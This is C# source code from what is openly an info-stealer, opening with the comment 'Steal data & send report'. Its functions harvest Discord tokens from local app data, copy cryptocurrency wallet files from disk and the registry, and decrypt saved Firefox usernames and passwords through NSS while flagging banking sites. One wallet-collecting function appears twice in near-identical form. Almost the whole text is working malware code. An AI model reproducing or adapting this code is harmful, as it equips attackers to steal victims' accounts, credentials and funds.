// Steal data & send report
public static string Save()
{
Console.WriteLine("Running passwords recovery...");
if (!Directory.Exists(PasswordsStoreDirectory))
{
Directory.CreateDirectory(PasswordsStoreDirectory);
}
else
{
try { Filemanager.RecursiveDelete(PasswordsStoreDirectory); } catch { Console.WriteLine("Failed recursive remove directory"); }
};
if (Report.CreateReport(PasswordsStoreDirectory))
{
return(PasswordsStoreDirectory);
}
return("");
}
// Get discord tokens
public static string[] GetTokens()
{
List <string> tokens = new List <string>();
try
{
foreach (string dir in DiscordDirectories)
{
string directory = Path.Combine(Paths.appdata, dir);
string cpdirectory = Path.Combine(Path.GetTempPath(), new DirectoryInfo(directory).Name);
if (!Directory.Exists(directory))
{
continue;
}
Filemanager.CopyDirectory(directory, cpdirectory);
foreach (string file in Directory.GetFiles(cpdirectory))
{
if (!file.EndsWith(".log") && !file.EndsWith(".ldb"))
{
continue;
}
string text = File.ReadAllText(file);
Match match = TokenRegex.Match(text);
if (match.Success)
{
tokens.Add($"{match.Value} - {TokenState(match.Value)}");
}
}
Filemanager.RecursiveDelete(cpdirectory);
}
}
catch (Exception ex) { Console.WriteLine(ex); }
return(tokens.ToArray());
}
// Write wallet.dat
public static void GetWallets(string sSaveDir)
{
try
{
Directory.CreateDirectory(sSaveDir);
foreach (string[] wallet in sWalletsDirectories)
{
CopyWalletFromDirectoryTo(sSaveDir, wallet[1], wallet[0]);
}
foreach (string wallet in sWalletsRegistry)
{
CopyWalletFromRegistryTo(sSaveDir, wallet);
}
if (Counter.Wallets == 0)
{
Filemanager.RecursiveDelete(sSaveDir);
}
} catch (System.Exception ex) { Logging.Log("Wallets >> Failed collect wallets\n" + ex); }
}
// Write wallet.dat
public static void GetWallets(string sSaveDir)
{
try
{
Directory.CreateDirectory(sSaveDir);
foreach (string[] wallet in sWalletsDirectories)
{
CopyWalletFromDirectoryTo(sSaveDir, wallet[1], wallet[0]);
}
foreach (string wallet in sWalletsRegistry)
{
CopyWalletFromRegistryTo(sSaveDir, wallet);
}
if (Counter.Wallets == 0)
{
Filemanager.RecursiveDelete(sSaveDir);
}
} catch { }
}
// Get bookmarks from gecko browser
public static List <Password> Get(string path)
{
List <Password> pPasswords = new List <Password>();
// Get firefox default profile directory
string profile = GetProfile(path);
if (profile == null)
{
return(pPasswords);
}
// Copy required files to temp dir
string newProfile = CopyRequiredFiles(profile);
if (newProfile == null)
{
return(pPasswords);
}
try
{
string JSON = File.ReadAllText(Path.Combine(newProfile, "logins.json"));
JSON = Regex.Split(JSON, ",\"logins\":\\[")[1];
JSON = Regex.Split(JSON, ",\"potentiallyVulnerablePasswords\"")[0];
string[] accounts = Regex.Split(JSON, "},");
if (Decryptor.LoadNSS(MozillaPath))
{
if (Decryptor.SetProfile(newProfile))
{
foreach (string account in accounts)
{
Match
host = FFRegex.hostname.Match(account),
user = FFRegex.username.Match(account),
pass = FFRegex.password.Match(account);
if (host.Success && user.Success && pass.Success)
{
string
hostname = Regex.Split(host.Value, "\"")[3],
username = Decryptor.DecryptPassword(Regex.Split(user.Value, "\"")[3]),
password = Decryptor.DecryptPassword(Regex.Split(pass.Value, "\"")[3]);
Password pPassword = new Password();
pPassword.sUrl = hostname;
pPassword.sUsername = username;
pPassword.sPassword = password;
// Analyze value
Banking.ScanData(hostname);
Counter.Passwords++;
pPasswords.Add(pPassword);
}
}
}
Decryptor.UnLoadNSS();
}
}
catch (Exception ex) { Logging.Log("Firefox >> Failed collect passwords\n" + ex); }
Filemanager.RecursiveDelete(newProfile);
return(pPasswords);
}
